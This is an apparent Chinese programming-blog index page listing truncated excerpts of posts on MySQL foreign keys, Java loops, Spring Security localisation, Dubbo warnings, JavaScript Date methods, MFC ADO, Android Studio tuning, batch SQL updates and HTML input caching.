    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他